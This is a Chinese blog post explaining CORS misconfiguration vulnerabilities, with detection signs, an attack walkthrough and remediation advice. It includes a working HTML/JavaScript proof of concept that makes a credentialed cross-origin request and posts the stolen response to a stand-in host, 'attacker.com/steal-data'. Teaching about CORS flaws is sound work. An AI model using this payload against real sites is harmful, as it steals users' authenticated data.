浅谈cors漏洞

于 2024-08-29 17:34:37 发布
阅读量422 收藏 10
点赞数 5
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63920195/article/details/141684217
版权

图片参考文章:浅析CORS攻击及其挖洞思路 - 先知社区 (aliyun.com)

背景

由于同源长策略 一些网站要实现跨域来共享资源的话

需要通过设置cors

如果cors配置不当(检验不严格 只是简单校验是否包含该域名)

就可能存在该漏洞

漏洞发现

origin 是源的意思 如果可控 并且返回包会出现以下两个字段

  • Access-Control-Allow-Origin
  • Access-Control-Allow-Credentials: true

攻击流程

创建恶意poc

攻击者创建恶意网页并使用JavaScript构造跨域请求的poc(一般是获取敏感信息)

如果cors需要绕过的话(子域名接管绕过)还要在poc设置Origin头为服务器信任的域或子域

<!DOCTYPE html>
  <html lang="en">
  <head>
  <meta charset="UTF-8">
  <title>Subdomain Takeover CORS PoC</title>
  </head>
  <body>
  <script>
  // 构造跨域请求,设置Origin为已接管的子域名
  fetch("https://vulnerable.com/sensitive-data", {
    method: "GET",
    headers: {
      "Origin": "https://evil.trusted.com"  // 设置伪造的Origin头
    },
    credentials: "include"  // 包含用户的认证信息(如cookies)
  })
  .then(response => response.text())
  .then(data => {
    // 将返回的数据显示或发送到攻击者控制的服务器
    console.log(data); // 在控制台显示敏感信息
    // 例如:将数据发送到攻击者的服务器
    fetch("https://attacker.com/steal-data", {
      method: "POST",
      body: data,
      headers: {
        "Content-Type": "application/x-www-form-urlencoded"
      }
    });
  })
  .catch(error => console.error("CORS request failed:", error));
</script>
  </body>
  </html>

诱使受害者点击

诱骗受害者访问该恶意网页

  • 将恶意网页托管在你的服务器上,并诱骗受害者访问该网页。
  • 受害者浏览器会在访问恶意网页时自动发起跨域请求,携带认证信息(如cookies)向目标网站发送请求。

攻击者获取数据

然后将获取的数据显发送回攻击者控制的服务器

  • 当目标服务器返回响应数据时,浏览器会根据CORS头判断是否允许访问数据。
  • 如果服务器误信任了恶意Origin,浏览器将允许JavaScript访问响应数据。
  • 将获取的数据显示在控制台、存储在本地,或发送回攻击者控制的服务器

漏洞修复

  • 限制Access-Control-Allow-Origin:

    • 不使用*通配符。
    • 只允许特定的可信任域名(如https://trusted.com)。

  • 控制Access-Control-Allow-Credentials:

    • 仅在必要时使用Access-Control-Allow-Credentials: true
    • 确保与明确的Origin配对使用,避免与*一起使用。

  • 限制HTTP方法和头部:

    • 通过Access-Control-Allow-Methods只允许需要的HTTP方法(如GET, POST)。
    • 通过Access-Control-Allow-Headers限制允许的请求头。

  • 服务器端验证Origin:

    • 在服务器端检查Origin,确保只有可信来源被允许。

  • 限制Access-Control-Max-Age:

    • 限制预检请求的缓存时间,避免过长时间的策略缓存。
v1nche3
关注
CORScanner:快速的CORS错误配置漏洞扫描器:clinking_beer_mugs:
04-30
关于CORScanner CORScanner是一个Python工具,旨在发现网站的CORS错误配置漏洞。 它可以帮助网站管理员和渗透测试人员检查他们针对的域/ URL是否具有不安全CORS策略。 特征 快。 它使用而不是Python线程进行并发,这对于网络扫描而言要快得多。 综合的。 它涵盖我们所知道的所有。 灵活的。 它支持各种自定义功能(例如文件输出),这有助于进行大规模扫描。 :NEW_button: CORScanner支持通过pip进行安装( pip install corscanner或pip install cors ) :NEW_button: CORScanner可以用作项目中的库。 有两个有用的参考资料,可以系统地理解CORS: USENIX安全性18论文: 中文详解: 如果您进行科学研究,请考虑引用我们的论文(点击我)。 乳胶版本: @inproceedings{chen-cors, au
前后端项目分离解决cors错误
热门推荐
ych_0901的博客
11-30 5万+
前后端分离项目解决cors错误 文章目录前后端分离项目解决cors错误前言一、配置类重写addCorsMappings方法二、controller添加@CrossOrigin注解总结 前言 前后端分离项目中接口请求会出现cors错误,引发cors错误的原因为跨域请求失败。 具体解决方法有配置类重写addCorsMappings方法、controller添加@CrossOrigin注解、使用nginx开启反向代理 提示:以下是本篇文章正文内容,下面案例可供参考 一、配置类重写addCorsMapping
CORS错误,跨域问题的解决
weixin_57396733的博客
04-29 1万+
当我们遇到CORS错误时,往往是跨域造成的 首先,我们需要了解下两个概念 跨域:不同源的ajax请求 同源:发出请求所在的页面 与 所请求的资源的url,协议相同,域名相同,端口相同 都相同。 同源情况 不同源情况 报CORS错误 解决方案,从npm下cors包,然后在我们的代码中添加这样一段代码 ...
CORS 报错】跨域请求问题:CORS 多种环境下的解决方案
最新发布
Allen-
07-11 5539
CORS问题是前端开发中常见的一个挑战,但通过合理的代理配置和服务器设置可以有效解决。在不同环境下,可以使用Vite的代理功能、设置请求头、JSONP、服务器端代理、Nginx代理等多种方式来解决跨域问题。
跨域问题详解:CORS问题+解决办法
weixin_45565886的博客
09-29 1万+
跨域问题详解:CORS问题+解决办法
浅谈CORS RTK技术在岩移监测中的应用
06-18
本文在介绍了CORSRTK原理及技术的基础上,阐述了传统岩移监测的方法和实际工作中遇到的困难,提出了一种新的方法-采用CORS RTK技术进行岩移监测,通过对比验证了该技术的可行性,并对其精度进行了论证。
跨域资源共享 CORS 详解
09-02
跨域资源共享(CORS,Cross-Origin Resource Sharing)是一种机制,旨在允许Web应用程序向不同源的服务器请求数据,而不会受到浏览器的同源策略限制。这一功能对于现代Web应用的开发至关重要,因为它允许开发者构建...
浅谈传统RTK单基站CORS和网络CORS的特点.pdf
05-16
在当今的测绘领域,实时动态定位技术(Real-Time Kinematic,RTK)和连续运行参考站系统(Continuously Operating Reference Stations,CORS)是实现精确测量的关键技术。本文将探讨传统RTK单基站CORS与网络CORS的...
用于检测HTTP请求头缺失和CORS跨域漏洞的工具
07-02
CORS配置错误可能导致安全漏洞,如未授权的数据访问或攻击者利用跨站请求伪造(CSRF)攻击。 工具的使用主要包括以下几个关键知识点: 1. **HTTP请求头检查**: - **Content-Type**:检查是否正确指定了请求体...
浅谈Koa2框架利用CORS完成跨域ajax请求
08-27
浅谈Koa2框架利用CORS完成跨域ajax请求 Koa2框架是基于Node.js的Web开发框架,可以用于构建Web应用程序。CORS(Cross-Origin Resource Sharing)是一种机制,允许Web页面从不同的域名下访问资源。本文将介绍如何...
vue axios 解决跨域问题CORS
07-08
在开发Web应用时,我们经常会遇到“跨域”(CORS)的问题,特别是在使用Vue.js框架和axios库进行API调用时。Vue.js是一个轻量级的前端框架,而axios则是一个基于Promise的HTTP库,它广泛用于Vue项目中进行数据获取和...
浅谈spring-boot 允许接口跨域并实现拦截(CORS
08-29
浅谈spring-boot允许接口跨域并实现拦截(CORS) Spring Boot中实现CORS(Cross-Origin Resource Sharing,跨域资源共享)机制是为了解决不同域名、协议或端口下的资源请求问题。在Spring Boot项目中,我们可以使用...
fastify-cors:加速 CORS
07-23
fastify-cors fastify-cors允许在 Fastify 应用程序中使用 。 支持 Fastify 3.x版本。 Fastify ^2.x兼容性请参考及相关版本。 Fastify ^1.x兼容性请参考及相关版本。 安装 npm i fastify-cors 用法 需要fastify-...
CORS-POC-Generator:Web脚本,使用HTML CSS和JS生成CORS漏洞的POC
04-07
CORS-POC生成器Web脚本使用HTML CSS和JS生成CORS漏洞的POC。 输入URL,如果您看到带有JSON数据的警报,则单击“生成”,然后利用它的可利用性,否则找到另一个端点。安装克隆回购文件并运行索引文件吧! 或实时生成...
cors-filter-2.5.jar
09-07
标题中的“cors-filter-2.5.jar”是一个Java Web应用程序使用的库,专门用于处理跨域资源共享(CORS)的问题。CORS是一种机制,允许Web应用通过浏览器从不同源(即非同源策略允许的源)获取资源,以克服浏览器的同源...
CORS错误是什么如何解决?
weixin_71583566的博客
09-02 2万+
如何解决CROS报错问题
解决CORS错误(Spring Boot)
墨辰JC的博客
02-07 5872
跨域(Cross-Origin)是指在Web开发中,当一个Web应用试图从一个源(域名、协议、端口组合)获取资源时,该请求的目标与当前页面的源不同。具体来说,当一个页面的JavaScript代码尝试向不同域名、协议或端口的服务器发送请求时,就会发生跨域请求。跨域请求是由浏览器实施的同源策略(Same-Origin Policy)限制导致的。同源策略是浏览器的一项安全机制,旨在保护用户的隐私和安全。同源策略要求Web页面只能从相同源加载资源,不同源的页面不能访问彼此的数据,以防止恶意网站获取用户的敏感信息。
CORS error跨域问题的原因分析和解决
stayh_ungry的博客
12-26 1万+
CORS error跨域问题的原因分析和解决
如何防止 CORS漏洞
04-22
CORS(跨来源资源共享)漏洞产生的主要原因是浏览器在AJAX异步请求数据时,为了保护用户隐私,会对跨域访问进行限制,但这种限制在某些情况下会被攻击者绕过,进而实现非法的跨域访问。 为了防止CORS漏洞,可以采取以下措施: 1.设置合理的Access-Control-Allow-Origin(允许跨域访问的源)响应头,只允许合法的源访问服务器资源。 2.限制HTTP请求方法和头字段,只允许特定的请求方法和头字段进行跨域访问。 3.使用cookie时,配置Access-Control-Allow-Credentials 响应头,指定为 true,这样跨域请求才能够发送 cookie。 4.检查请求是否合法,如检查Referer和Origin,避免攻击者伪造请求。 5.使用反向代理或者服务端转发的方式,将跨域请求代理到同一域名下进行处理,从而避免浏览器的跨域限制。 总之,防止CORS漏洞需要从多个方面进行考虑和处理,对于开发人员来说,需要注意跨域访问的安全问题,从而保障Web应用的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值